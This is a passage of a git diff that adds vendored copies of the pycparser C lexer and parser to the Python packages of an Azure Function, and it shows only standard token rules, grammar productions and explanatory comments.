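+    # trailing `TT x = 5;` once again lexes TT as a TYPEID.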
+ # + @TOKEN(r'\{') + def t_LBRACE(self, t): + self.on_lbrace_func() + return t + @TOKEN(r'\}') + def t_RBRACE(self, t): + self.on_rbrace_func() + return t + + t_STRING_LITERAL = string_literal + + # The following floating and integer constants are defined as + # functions to impose a strict order (otherwise, decimal + # is placed before the others because its regex is longer, + # and this is bad) + # + @TOKEN(floating_constant) + def t_FLOAT_CONST(self, t): + return t + + @TOKEN(hex_floating_constant) + def t_HEX_FLOAT_CONST(self, t): + return t + + @TOKEN(hex_constant) + def t_INT_CONST_HEX(self, t): + return t + + @TOKEN(bin_constant) + def t_INT_CONST_BIN(self, t): + return t + + @TOKEN(bad_octal_constant) + def t_BAD_CONST_OCT(self, t): + msg = "Invalid octal constant" + self._error(msg, t) + + @TOKEN(octal_constant) + def t_INT_CONST_OCT(self, t): + return t + + @TOKEN(decimal_constant) + def t_INT_CONST_DEC(self, t): + return t + + # Must come before bad_char_const, to prevent it from + # catching valid char constants as invalid + # + @TOKEN(multicharacter_constant) + def t_INT_CONST_CHAR(self, t): + return t + + @TOKEN(char_const) + def t_CHAR_CONST(self, t): + return t + + @TOKEN(wchar_const) + def t_WCHAR_CONST(self, t): + return t + + @TOKEN(u8char_const) + def t_U8CHAR_CONST(self, t): + return t + + @TOKEN(u16char_const) + def t_U16CHAR_CONST(self, t): + return t + + @TOKEN(u32char_const) + def t_U32CHAR_CONST(self, t): + return t + + @TOKEN(unmatched_quote) + def t_UNMATCHED_QUOTE(self, t): + msg = "Unmatched '" + self._error(msg, t) + + @TOKEN(bad_char_const) + def t_BAD_CHAR_CONST(self, t): + msg = "Invalid char constant %s" % t.value + self._error(msg, t) + + @TOKEN(wstring_literal) + def t_WSTRING_LITERAL(self, t): + return t + + @TOKEN(u8string_literal) + def t_U8STRING_LITERAL(self, t): + return t + + @TOKEN(u16string_literal) + def t_U16STRING_LITERAL(self, t): + return t + + @TOKEN(u32string_literal) + def t_U32STRING_LITERAL(self, t): + return t + + # unmatched string literals are caught by the preprocessor + + @TOKEN(bad_string_literal) + def t_BAD_STRING_LITERAL(self, t): + msg = "String contains invalid escape code" + self._error(msg, t) + + @TOKEN(identifier) + def t_ID(self, t): + t.type = self.keyword_map.get(t.value, "ID") + if t.type == 'ID' and self.type_lookup_func(t.value): + t.type = "TYPEID" + return t + + def t_error(self, t): + msg = 'Illegal character %s' % repr(t.value[0]) + self._error(msg, t) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_parser.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_parser.py new file mode 100644 index 0000000..6d7c65b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_parser.py @@ -0,0 +1,1936 @@ +#------------------------------------------------------------------------------ +# pycparser: c_parser.py +# +# CParser class: Parser and AST builder for the C language +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#------------------------------------------------------------------------------ +from .ply import yacc + +from . 
import c_ast +from .c_lexer import CLexer +from .plyparser import PLYParser, ParseError, parameterized, template +from .ast_transforms import fix_switch_cases, fix_atomic_specifiers + + +@template +class CParser(PLYParser): + def __init__( + self, + lex_optimize=True, + lexer=CLexer, + lextab='pycparser.lextab', + yacc_optimize=True, + yacctab='pycparser.yacctab', + yacc_debug=False, + taboutputdir=''): + """ Create a new CParser. + + Some arguments for controlling the debug/optimization + level of the parser are provided. The defaults are + tuned for release/performance mode. + The simple rules for using them are: + *) When tweaking CParser/CLexer, set these to False + *) When releasing a stable parser, set to True + + lex_optimize: + Set to False when you're modifying the lexer. + Otherwise, changes in the lexer won't be used, if + some lextab.py file exists. + When releasing with a stable lexer, set to True + to save the re-generation of the lexer table on + each run. + + lexer: + Set this parameter to define the lexer to use if + you're not using the default CLexer. + + lextab: + Points to the lex table that's used for optimized + mode. Only if you're modifying the lexer and want + some tests to avoid re-generating the table, make + this point to a local lex table file (that's been + earlier generated with lex_optimize=True) + + yacc_optimize: + Set to False when you're modifying the parser. + Otherwise, changes in the parser won't be used, if + some parsetab.py file exists. + When releasing with a stable parser, set to True + to save the re-generation of the parser table on + each run. + + yacctab: + Points to the yacc table that's used for optimized + mode. Only if you're modifying the parser, make + this point to a local yacc table file + + yacc_debug: + Generate a parser.out file that explains how yacc + built the parsing table from the grammar. + + taboutputdir: + Set this parameter to control the location of generated + lextab and yacctab files. + """ + self.clex = lexer( + error_func=self._lex_error_func, + on_lbrace_func=self._lex_on_lbrace_func, + on_rbrace_func=self._lex_on_rbrace_func, + type_lookup_func=self._lex_type_lookup_func) + + self.clex.build( + optimize=lex_optimize, + lextab=lextab, + outputdir=taboutputdir) + self.tokens = self.clex.tokens + + rules_with_opt = [ + 'abstract_declarator', + 'assignment_expression', + 'declaration_list', + 'declaration_specifiers_no_type', + 'designation', + 'expression', + 'identifier_list', + 'init_declarator_list', + 'id_init_declarator_list', + 'initializer_list', + 'parameter_type_list', + 'block_item_list', + 'type_qualifier_list', + 'struct_declarator_list' + ] + + for rule in rules_with_opt: + self._create_opt_rule(rule) + + self.cparser = yacc.yacc( + module=self, + start='translation_unit_or_empty', + debug=yacc_debug, + optimize=yacc_optimize, + tabmodule=yacctab, + outputdir=taboutputdir) + + # Stack of scopes for keeping track of symbols. _scope_stack[-1] is + # the current (topmost) scope. Each scope is a dictionary that + # specifies whether a name is a type. If _scope_stack[n][name] is + # True, 'name' is currently a type in the scope. If it's False, + # 'name' is used in the scope but not as a type (for instance, if we + # saw: int name; + # If 'name' is not a key in _scope_stack[n] then 'name' was not defined + # in this scope at all. 
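+        #
+        # Illustrative snapshot (editorial sketch, not from upstream): while
+        # parsing the body of f in
+        #
+        #     typedef int T;
+        #     void f(int T) { /* here */ }
+        #
+        # the stack is roughly [{'T': True, 'f': False}, {'T': False}], so
+        # T is a typedef name outside f but a plain identifier inside it.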
+ self._scope_stack = [dict()] + + # Keeps track of the last token given to yacc (the lookahead token) + self._last_yielded_token = None + + def parse(self, text, filename='', debug=False): + """ Parses C code and returns an AST. + + text: + A string containing the C source code + + filename: + Name of the file being parsed (for meaningful + error messages) + + debug: + Debug flag to YACC + """ + self.clex.filename = filename + self.clex.reset_lineno() + self._scope_stack = [dict()] + self._last_yielded_token = None + return self.cparser.parse( + input=text, + lexer=self.clex, + debug=debug) + + ######################-- PRIVATE --###################### + + def _push_scope(self): + self._scope_stack.append(dict()) + + def _pop_scope(self): + assert len(self._scope_stack) > 1 + self._scope_stack.pop() + + def _add_typedef_name(self, name, coord): + """ Add a new typedef name (ie a TYPEID) to the current scope + """ + if not self._scope_stack[-1].get(name, True): + self._parse_error( + "Typedef %r previously declared as non-typedef " + "in this scope" % name, coord) + self._scope_stack[-1][name] = True + + def _add_identifier(self, name, coord): + """ Add a new object, function, or enum member name (ie an ID) to the + current scope + """ + if self._scope_stack[-1].get(name, False): + self._parse_error( + "Non-typedef %r previously declared as typedef " + "in this scope" % name, coord) + self._scope_stack[-1][name] = False + + def _is_type_in_scope(self, name): + """ Is *name* a typedef-name in the current scope? + """ + for scope in reversed(self._scope_stack): + # If name is an identifier in this scope it shadows typedefs in + # higher scopes. + in_scope = scope.get(name) + if in_scope is not None: return in_scope + return False + + def _lex_error_func(self, msg, line, column): + self._parse_error(msg, self._coord(line, column)) + + def _lex_on_lbrace_func(self): + self._push_scope() + + def _lex_on_rbrace_func(self): + self._pop_scope() + + def _lex_type_lookup_func(self, name): + """ Looks up types that were previously defined with + typedef. + Passed to the lexer for recognizing identifiers that + are types. + """ + is_type = self._is_type_in_scope(name) + return is_type + + def _get_yacc_lookahead_token(self): + """ We need access to yacc's lookahead token in certain cases. + This is the last token yacc requested from the lexer, so we + ask the lexer. + """ + return self.clex.last_token + + # To understand what's going on here, read sections A.8.5 and + # A.8.6 of K&R2 very carefully. + # + # A C type consists of a basic type declaration, with a list + # of modifiers. For example: + # + # int *c[5]; + # + # The basic declaration here is 'int c', and the pointer and + # the array are the modifiers. + # + # Basic declarations are represented by TypeDecl (from module c_ast) and the + # modifiers are FuncDecl, PtrDecl and ArrayDecl. + # + # The standard states that whenever a new modifier is parsed, it should be + # added to the end of the list of modifiers. For example: + # + # K&R2 A.8.6.2: Array Declarators + # + # In a declaration T D where D has the form + # D1 [constant-expression-opt] + # and the type of the identifier in the declaration T D1 is + # "type-modifier T", the type of the + # identifier of D is "type-modifier array of T" + # + # This is what this method does. The declarator it receives + # can be a list of declarators ending with TypeDecl. It + # tacks the modifier to the end of this list, just before + # the TypeDecl. 
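+    #
+    # Illustrative result (editorial sketch, not from upstream): for
+    #
+    #     int *c[5];
+    #
+    # the finished declarator chain is
+    #
+    #     ArrayDecl(dim=5) -> PtrDecl -> TypeDecl('c') -> IdentifierType(['int'])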
+ # + # Additionally, the modifier may be a list itself. This is + # useful for pointers, that can come as a chain from the rule + # p_pointer. In this case, the whole modifier list is spliced + # into the new location. + def _type_modify_decl(self, decl, modifier): + """ Tacks a type modifier on a declarator, and returns + the modified declarator. + + Note: the declarator and modifier may be modified + """ + #~ print '****' + #~ decl.show(offset=3) + #~ modifier.show(offset=3) + #~ print '****' + + modifier_head = modifier + modifier_tail = modifier + + # The modifier may be a nested list. Reach its tail. + while modifier_tail.type: + modifier_tail = modifier_tail.type + + # If the decl is a basic type, just tack the modifier onto it. + if isinstance(decl, c_ast.TypeDecl): + modifier_tail.type = decl + return modifier + else: + # Otherwise, the decl is a list of modifiers. Reach + # its tail and splice the modifier onto the tail, + # pointing to the underlying basic type. + decl_tail = decl + + while not isinstance(decl_tail.type, c_ast.TypeDecl): + decl_tail = decl_tail.type + + modifier_tail.type = decl_tail.type + decl_tail.type = modifier_head + return decl + + # Due to the order in which declarators are constructed, + # they have to be fixed in order to look like a normal AST. + # + # When a declaration arrives from syntax construction, it has + # these problems: + # * The innermost TypeDecl has no type (because the basic + # type is only known at the uppermost declaration level) + # * The declaration has no variable name, since that is saved + # in the innermost TypeDecl + # * The typename of the declaration is a list of type + # specifiers, and not a node. Here, basic identifier types + # should be separated from more complex types like enums + # and structs. + # + # This method fixes these problems. + def _fix_decl_name_type(self, decl, typename): + """ Fixes a declaration. Modifies decl. + """ + # Reach the underlying basic type + # + type = decl + while not isinstance(type, c_ast.TypeDecl): + type = type.type + + decl.name = type.declname + type.quals = decl.quals[:] + + # The typename is a list of types. If any type in this + # list isn't an IdentifierType, it must be the only + # type in the list (it's illegal to declare "int enum ..") + # If all the types are basic, they're collected in the + # IdentifierType holder. + for tn in typename: + if not isinstance(tn, c_ast.IdentifierType): + if len(typename) > 1: + self._parse_error( + "Invalid multiple types specified", tn.coord) + else: + type.type = tn + return decl + + if not typename: + # Functions default to returning int + # + if not isinstance(decl.type, c_ast.FuncDecl): + self._parse_error( + "Missing type in declaration", decl.coord) + type.type = c_ast.IdentifierType( + ['int'], + coord=decl.coord) + else: + # At this point, we know that typename is a list of IdentifierType + # nodes. Concatenate all the names into a single list. + # + type.type = c_ast.IdentifierType( + [name for id in typename for name in id.names], + coord=typename[0].coord) + return decl + + def _add_declaration_specifier(self, declspec, newspec, kind, append=False): + """ Declaration specifiers are represented by a dictionary + with the entries: + * qual: a list of type qualifiers + * storage: a list of storage type qualifiers + * type: a list of type specifiers + * function: a list of function specifiers + * alignment: a list of alignment specifiers + + This method is given a declaration specifier, and a + new specifier of a given kind. 
+ If `append` is True, the new specifier is added to the end of + the specifiers list, otherwise it's added at the beginning. + Returns the declaration specifier, with the new + specifier incorporated. + """ + spec = declspec or dict(qual=[], storage=[], type=[], function=[], alignment=[]) + + if append: + spec[kind].append(newspec) + else: + spec[kind].insert(0, newspec) + + return spec + + def _build_declarations(self, spec, decls, typedef_namespace=False): + """ Builds a list of declarations all sharing the given specifiers. + If typedef_namespace is true, each declared name is added + to the "typedef namespace", which also includes objects, + functions, and enum constants. + """ + is_typedef = 'typedef' in spec['storage'] + declarations = [] + + # Bit-fields are allowed to be unnamed. + if decls[0].get('bitsize') is not None: + pass + + # When redeclaring typedef names as identifiers in inner scopes, a + # problem can occur where the identifier gets grouped into + # spec['type'], leaving decl as None. This can only occur for the + # first declarator. + elif decls[0]['decl'] is None: + if len(spec['type']) < 2 or len(spec['type'][-1].names) != 1 or \ + not self._is_type_in_scope(spec['type'][-1].names[0]): + coord = '?' + for t in spec['type']: + if hasattr(t, 'coord'): + coord = t.coord + break + self._parse_error('Invalid declaration', coord) + + # Make this look as if it came from "direct_declarator:ID" + decls[0]['decl'] = c_ast.TypeDecl( + declname=spec['type'][-1].names[0], + type=None, + quals=None, + align=spec['alignment'], + coord=spec['type'][-1].coord) + # Remove the "new" type's name from the end of spec['type'] + del spec['type'][-1] + + # A similar problem can occur where the declaration ends up looking + # like an abstract declarator. Give it a name if this is the case. + elif not isinstance(decls[0]['decl'], ( + c_ast.Enum, c_ast.Struct, c_ast.Union, c_ast.IdentifierType)): + decls_0_tail = decls[0]['decl'] + while not isinstance(decls_0_tail, c_ast.TypeDecl): + decls_0_tail = decls_0_tail.type + if decls_0_tail.declname is None: + decls_0_tail.declname = spec['type'][-1].names[0] + del spec['type'][-1] + + for decl in decls: + assert decl['decl'] is not None + if is_typedef: + declaration = c_ast.Typedef( + name=None, + quals=spec['qual'], + storage=spec['storage'], + type=decl['decl'], + coord=decl['decl'].coord) + else: + declaration = c_ast.Decl( + name=None, + quals=spec['qual'], + align=spec['alignment'], + storage=spec['storage'], + funcspec=spec['function'], + type=decl['decl'], + init=decl.get('init'), + bitsize=decl.get('bitsize'), + coord=decl['decl'].coord) + + if isinstance(declaration.type, ( + c_ast.Enum, c_ast.Struct, c_ast.Union, + c_ast.IdentifierType)): + fixed_decl = declaration + else: + fixed_decl = self._fix_decl_name_type(declaration, spec['type']) + + # Add the type name defined by typedef to a + # symbol table (for usage in the lexer) + if typedef_namespace: + if is_typedef: + self._add_typedef_name(fixed_decl.name, fixed_decl.coord) + else: + self._add_identifier(fixed_decl.name, fixed_decl.coord) + + fixed_decl = fix_atomic_specifiers(fixed_decl) + declarations.append(fixed_decl) + + return declarations + + def _build_function_definition(self, spec, decl, param_decls, body): + """ Builds a function definition. 
+        """
+        if 'typedef' in spec['storage']:
+            self._parse_error("Invalid typedef", decl.coord)
+
+        declaration = self._build_declarations(
+            spec=spec,
+            decls=[dict(decl=decl, init=None)],
+            typedef_namespace=True)[0]
+
+        return c_ast.FuncDef(
+            decl=declaration,
+            param_decls=param_decls,
+            body=body,
+            coord=decl.coord)
+
+    def _select_struct_union_class(self, token):
+        """ Given a token (either STRUCT or UNION), selects the
+            appropriate AST class.
+        """
+        if token == 'struct':
+            return c_ast.Struct
+        else:
+            return c_ast.Union
+
+    ##
+    ## Precedence and associativity of operators
+    ##
+    # If this changes, c_generator.CGenerator.precedence_map needs to change as
+    # well
+    precedence = (
+        ('left', 'LOR'),
+        ('left', 'LAND'),
+        ('left', 'OR'),
+        ('left', 'XOR'),
+        ('left', 'AND'),
+        ('left', 'EQ', 'NE'),
+        ('left', 'GT', 'GE', 'LT', 'LE'),
+        ('left', 'RSHIFT', 'LSHIFT'),
+        ('left', 'PLUS', 'MINUS'),
+        ('left', 'TIMES', 'DIVIDE', 'MOD')
+    )
+
+    ##
+    ## Grammar productions
+    ## Implementation of the BNF defined in K&R2 A.13
+    ##
+
+    # Wrapper around a translation unit, to allow for empty input.
+    # Not strictly part of the C99 Grammar, but useful in practice.
+    def p_translation_unit_or_empty(self, p):
+        """ translation_unit_or_empty   : translation_unit
+                                        | empty
+        """
+        if p[1] is None:
+            p[0] = c_ast.FileAST([])
+        else:
+            p[0] = c_ast.FileAST(p[1])
+
+    def p_translation_unit_1(self, p):
+        """ translation_unit    : external_declaration
+        """
+        # Note: external_declaration is already a list
+        p[0] = p[1]
+
+    def p_translation_unit_2(self, p):
+        """ translation_unit    : translation_unit external_declaration
+        """
+        p[1].extend(p[2])
+        p[0] = p[1]
+
+    # Declarations always come as lists (because they can be
+    # several in one line), so we wrap the function definition
+    # into a list as well, to make the return value of
+    # external_declaration homogeneous.
+    def p_external_declaration_1(self, p):
+        """ external_declaration    : function_definition
+        """
+        p[0] = [p[1]]
+
+    def p_external_declaration_2(self, p):
+        """ external_declaration    : declaration
+        """
+        p[0] = p[1]
+
+    def p_external_declaration_3(self, p):
+        """ external_declaration    : pp_directive
+                                    | pppragma_directive
+        """
+        p[0] = [p[1]]
+
+    def p_external_declaration_4(self, p):
+        """ external_declaration    : SEMI
+        """
+        p[0] = []
+
+    def p_external_declaration_5(self, p):
+        """ external_declaration    : static_assert
+        """
+        p[0] = p[1]
+
+    def p_static_assert_declaration(self, p):
+        """ static_assert           : _STATIC_ASSERT LPAREN constant_expression COMMA unified_string_literal RPAREN
+                                    | _STATIC_ASSERT LPAREN constant_expression RPAREN
+        """
+        if len(p) == 5:
+            p[0] = [c_ast.StaticAssert(p[3], None, self._token_coord(p, 1))]
+        else:
+            p[0] = [c_ast.StaticAssert(p[3], p[5], self._token_coord(p, 1))]
+
+    def p_pp_directive(self, p):
+        """ pp_directive  : PPHASH
+        """
+        self._parse_error('Directives not supported yet',
+                          self._token_coord(p, 1))
+
+    def p_pppragma_directive(self, p):
+        """ pppragma_directive      : PPPRAGMA
+                                    | PPPRAGMA PPPRAGMASTR
+        """
+        if len(p) == 3:
+            p[0] = c_ast.Pragma(p[2], self._token_coord(p, 2))
+        else:
+            p[0] = c_ast.Pragma("", self._token_coord(p, 1))
+
+    # In function definitions, the declarator can be followed by
+    # a declaration list, for old "K&R style" function definitions.
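
A hedged sketch of the old-style form the first production below accepts
(assumes `pycparser` is importable); the parameter types arrive through
`declaration_list_opt`:

    from pycparser import c_parser

    src = r"""
    int add(a, b)
        int a, b;
    {
        return a + b;
    }
    """
    c_parser.CParser().parse(src).show()
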
+    def p_function_definition_1(self, p):
+        """ function_definition : id_declarator declaration_list_opt compound_statement
+        """
+        # no declaration specifiers - 'int' becomes the default type
+        spec = dict(
+            qual=[],
+            alignment=[],
+            storage=[],
+            type=[c_ast.IdentifierType(['int'],
+                                       coord=self._token_coord(p, 1))],
+            function=[])
+
+        p[0] = self._build_function_definition(
+            spec=spec,
+            decl=p[1],
+            param_decls=p[2],
+            body=p[3])
+
+    def p_function_definition_2(self, p):
+        """ function_definition : declaration_specifiers id_declarator declaration_list_opt compound_statement
+        """
+        spec = p[1]
+
+        p[0] = self._build_function_definition(
+            spec=spec,
+            decl=p[2],
+            param_decls=p[3],
+            body=p[4])
+
+    # Note: according to C18 A.2.2 6.7.10, a static_assert-declaration
+    # (_Static_assert) is a declaration, not a statement. We additionally
+    # recognise it as a statement to fix parsing of _Static_assert inside
+    # functions.
+    #
+    def p_statement(self, p):
+        """ statement   : labeled_statement
+                        | expression_statement
+                        | compound_statement
+                        | selection_statement
+                        | iteration_statement
+                        | jump_statement
+                        | pppragma_directive
+                        | static_assert
+        """
+        p[0] = p[1]
+
+    # A pragma is generally considered a decorator rather than an actual
+    # statement. Still, for the purposes of analyzing an abstract syntax tree of
+    # C code, pragmas should not be ignored and were previously treated as a
+    # statement. This presents a problem for constructs that take a statement
+    # such as labeled_statements, selection_statements, and
+    # iteration_statements, causing a misleading structure in the AST. For
+    # example, consider the following C code.
+    #
+    #   for (int i = 0; i < 3; i++)
+    #       #pragma omp critical
+    #       sum += 1;
+    #
+    # This code will compile and execute "sum += 1;" as the body of the for
+    # loop. Previous implementations of PyCParser would render the AST for this
+    # block of code as follows:
+    #
+    #   For:
+    #     DeclList:
+    #       Decl: i, [], [], []
+    #         TypeDecl: i, []
+    #           IdentifierType: ['int']
+    #         Constant: int, 0
+    #     BinaryOp: <
+    #       ID: i
+    #       Constant: int, 3
+    #     UnaryOp: p++
+    #       ID: i
+    #     Pragma: omp critical
+    #   Assignment: +=
+    #     ID: sum
+    #     Constant: int, 1
+    #
+    # This AST misleadingly takes the Pragma as the body of the loop and the
+    # assignment then becomes a sibling of the loop.
+    #
+    # To solve edge cases like these, the pragmacomp_or_statement rule groups
+    # a pragma and its following statement (which would otherwise be orphaned)
+    # using a compound block, effectively turning the above code into:
+    #
+    #   for (int i = 0; i < 3; i++) {
+    #       #pragma omp critical
+    #       sum += 1;
+    #   }
+    def p_pragmacomp_or_statement(self, p):
+        """ pragmacomp_or_statement     : pppragma_directive statement
+                                        | statement
+        """
+        if isinstance(p[1], c_ast.Pragma) and len(p) == 3:
+            p[0] = c_ast.Compound(
+                block_items=[p[1], p[2]],
+                coord=self._token_coord(p, 1))
+        else:
+            p[0] = p[1]
+
+    # In C, declarations can come several in a line:
+    #   int x, *px, romulo = 5;
+    #
+    # However, for the AST, we will split them to separate Decl
+    # nodes.
+    #
+    # This rule splits its declarations and always returns a list
+    # of Decl nodes, even if it's one element long.
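
A quick, hedged check of that splitting (assumes `pycparser` is importable):

    from pycparser import c_parser

    ast = c_parser.CParser().parse("int x, *px, romulo = 5;")
    print(len(ast.ext))  # 3 -- one Decl node per declarator
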
+ # + def p_decl_body(self, p): + """ decl_body : declaration_specifiers init_declarator_list_opt + | declaration_specifiers_no_type id_init_declarator_list_opt + """ + spec = p[1] + + # p[2] (init_declarator_list_opt) is either a list or None + # + if p[2] is None: + # By the standard, you must have at least one declarator unless + # declaring a structure tag, a union tag, or the members of an + # enumeration. + # + ty = spec['type'] + s_u_or_e = (c_ast.Struct, c_ast.Union, c_ast.Enum) + if len(ty) == 1 and isinstance(ty[0], s_u_or_e): + decls = [c_ast.Decl( + name=None, + quals=spec['qual'], + align=spec['alignment'], + storage=spec['storage'], + funcspec=spec['function'], + type=ty[0], + init=None, + bitsize=None, + coord=ty[0].coord)] + + # However, this case can also occur on redeclared identifiers in + # an inner scope. The trouble is that the redeclared type's name + # gets grouped into declaration_specifiers; _build_declarations + # compensates for this. + # + else: + decls = self._build_declarations( + spec=spec, + decls=[dict(decl=None, init=None)], + typedef_namespace=True) + + else: + decls = self._build_declarations( + spec=spec, + decls=p[2], + typedef_namespace=True) + + p[0] = decls + + # The declaration has been split to a decl_body sub-rule and + # SEMI, because having them in a single rule created a problem + # for defining typedefs. + # + # If a typedef line was directly followed by a line using the + # type defined with the typedef, the type would not be + # recognized. This is because to reduce the declaration rule, + # the parser's lookahead asked for the token after SEMI, which + # was the type from the next line, and the lexer had no chance + # to see the updated type symbol table. + # + # Splitting solves this problem, because after seeing SEMI, + # the parser reduces decl_body, which actually adds the new + # type into the table to be seen by the lexer before the next + # line is reached. + def p_declaration(self, p): + """ declaration : decl_body SEMI + """ + p[0] = p[1] + + # Since each declaration is a list of declarations, this + # rule will combine all the declarations and return a single + # list + # + def p_declaration_list(self, p): + """ declaration_list : declaration + | declaration_list declaration + """ + p[0] = p[1] if len(p) == 2 else p[1] + p[2] + + # To know when declaration-specifiers end and declarators begin, + # we require declaration-specifiers to have at least one + # type-specifier, and disallow typedef-names after we've seen any + # type-specifier. These are both required by the spec. + # + def p_declaration_specifiers_no_type_1(self, p): + """ declaration_specifiers_no_type : type_qualifier declaration_specifiers_no_type_opt + """ + p[0] = self._add_declaration_specifier(p[2], p[1], 'qual') + + def p_declaration_specifiers_no_type_2(self, p): + """ declaration_specifiers_no_type : storage_class_specifier declaration_specifiers_no_type_opt + """ + p[0] = self._add_declaration_specifier(p[2], p[1], 'storage') + + def p_declaration_specifiers_no_type_3(self, p): + """ declaration_specifiers_no_type : function_specifier declaration_specifiers_no_type_opt + """ + p[0] = self._add_declaration_specifier(p[2], p[1], 'function') + + # Without this, `typedef _Atomic(T) U` will parse incorrectly because the + # _Atomic qualifier will match, instead of the specifier. 
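
A hedged illustration of the case that comment describes (assumes `pycparser`
is importable); with the rule below, the parenthesized form is taken as a
specifier and the typedef parses cleanly:

    from pycparser import c_parser

    ast = c_parser.CParser().parse("typedef _Atomic(int) atomic_int;")
    ast.show()
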
+ def p_declaration_specifiers_no_type_4(self, p): + """ declaration_specifiers_no_type : atomic_specifier declaration_specifiers_no_type_opt + """ + p[0] = self._add_declaration_specifier(p[2], p[1], 'type') + + def p_declaration_specifiers_no_type_5(self, p): + """ declaration_specifiers_no_type : alignment_specifier declaration_specifiers_no_type_opt + """ + p[0] = self._add_declaration_specifier(p[2], p[1], 'alignment') + + def p_declaration_specifiers_1(self, p): + """ declaration_specifiers : declaration_specifiers type_qualifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'qual', append=True) + + def p_declaration_specifiers_2(self, p): + """ declaration_specifiers : declaration_specifiers storage_class_specifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'storage', append=True) + + def p_declaration_specifiers_3(self, p): + """ declaration_specifiers : declaration_specifiers function_specifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'function', append=True) + + def p_declaration_specifiers_4(self, p): + """ declaration_specifiers : declaration_specifiers type_specifier_no_typeid + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True) + + def p_declaration_specifiers_5(self, p): + """ declaration_specifiers : type_specifier + """ + p[0] = self._add_declaration_specifier(None, p[1], 'type') + + def p_declaration_specifiers_6(self, p): + """ declaration_specifiers : declaration_specifiers_no_type type_specifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True) + + def p_declaration_specifiers_7(self, p): + """ declaration_specifiers : declaration_specifiers alignment_specifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'alignment', append=True) + + def p_storage_class_specifier(self, p): + """ storage_class_specifier : AUTO + | REGISTER + | STATIC + | EXTERN + | TYPEDEF + | _THREAD_LOCAL + """ + p[0] = p[1] + + def p_function_specifier(self, p): + """ function_specifier : INLINE + | _NORETURN + """ + p[0] = p[1] + + def p_type_specifier_no_typeid(self, p): + """ type_specifier_no_typeid : VOID + | _BOOL + | CHAR + | SHORT + | INT + | LONG + | FLOAT + | DOUBLE + | _COMPLEX + | SIGNED + | UNSIGNED + | __INT128 + """ + p[0] = c_ast.IdentifierType([p[1]], coord=self._token_coord(p, 1)) + + def p_type_specifier(self, p): + """ type_specifier : typedef_name + | enum_specifier + | struct_or_union_specifier + | type_specifier_no_typeid + | atomic_specifier + """ + p[0] = p[1] + + # See section 6.7.2.4 of the C11 standard. 
+ def p_atomic_specifier(self, p): + """ atomic_specifier : _ATOMIC LPAREN type_name RPAREN + """ + typ = p[3] + typ.quals.append('_Atomic') + p[0] = typ + + def p_type_qualifier(self, p): + """ type_qualifier : CONST + | RESTRICT + | VOLATILE + | _ATOMIC + """ + p[0] = p[1] + + def p_init_declarator_list(self, p): + """ init_declarator_list : init_declarator + | init_declarator_list COMMA init_declarator + """ + p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]] + + # Returns a {decl= : init=} dictionary + # If there's no initializer, uses None + # + def p_init_declarator(self, p): + """ init_declarator : declarator + | declarator EQUALS initializer + """ + p[0] = dict(decl=p[1], init=(p[3] if len(p) > 2 else None)) + + def p_id_init_declarator_list(self, p): + """ id_init_declarator_list : id_init_declarator + | id_init_declarator_list COMMA init_declarator + """ + p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]] + + def p_id_init_declarator(self, p): + """ id_init_declarator : id_declarator + | id_declarator EQUALS initializer + """ + p[0] = dict(decl=p[1], init=(p[3] if len(p) > 2 else None)) + + # Require at least one type specifier in a specifier-qualifier-list + # + def p_specifier_qualifier_list_1(self, p): + """ specifier_qualifier_list : specifier_qualifier_list type_specifier_no_typeid + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True) + + def p_specifier_qualifier_list_2(self, p): + """ specifier_qualifier_list : specifier_qualifier_list type_qualifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'qual', append=True) + + def p_specifier_qualifier_list_3(self, p): + """ specifier_qualifier_list : type_specifier + """ + p[0] = self._add_declaration_specifier(None, p[1], 'type') + + def p_specifier_qualifier_list_4(self, p): + """ specifier_qualifier_list : type_qualifier_list type_specifier + """ + p[0] = dict(qual=p[1], alignment=[], storage=[], type=[p[2]], function=[]) + + def p_specifier_qualifier_list_5(self, p): + """ specifier_qualifier_list : alignment_specifier + """ + p[0] = dict(qual=[], alignment=[p[1]], storage=[], type=[], function=[]) + + def p_specifier_qualifier_list_6(self, p): + """ specifier_qualifier_list : specifier_qualifier_list alignment_specifier + """ + p[0] = self._add_declaration_specifier(p[1], p[2], 'alignment') + + # TYPEID is allowed here (and in other struct/enum related tag names), because + # struct/enum tags reside in their own namespace and can be named the same as types + # + def p_struct_or_union_specifier_1(self, p): + """ struct_or_union_specifier : struct_or_union ID + | struct_or_union TYPEID + """ + klass = self._select_struct_union_class(p[1]) + # None means no list of members + p[0] = klass( + name=p[2], + decls=None, + coord=self._token_coord(p, 2)) + + def p_struct_or_union_specifier_2(self, p): + """ struct_or_union_specifier : struct_or_union brace_open struct_declaration_list brace_close + | struct_or_union brace_open brace_close + """ + klass = self._select_struct_union_class(p[1]) + if len(p) == 4: + # Empty sequence means an empty list of members + p[0] = klass( + name=None, + decls=[], + coord=self._token_coord(p, 2)) + else: + p[0] = klass( + name=None, + decls=p[3], + coord=self._token_coord(p, 2)) + + + def p_struct_or_union_specifier_3(self, p): + """ struct_or_union_specifier : struct_or_union ID brace_open struct_declaration_list brace_close + | struct_or_union ID brace_open brace_close + | struct_or_union TYPEID brace_open struct_declaration_list brace_close + | struct_or_union 
